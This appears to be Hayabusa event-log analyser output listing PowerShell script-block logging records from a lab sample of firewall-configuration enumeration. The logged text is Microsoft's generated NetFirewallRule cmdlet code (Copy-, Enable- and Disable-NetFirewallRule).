Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetFirewallRule' function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, 
ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) 
$__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MS",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.582 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and 
(@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } 
if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } 
$__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetFirewallRule' function Disable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, 
[Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, 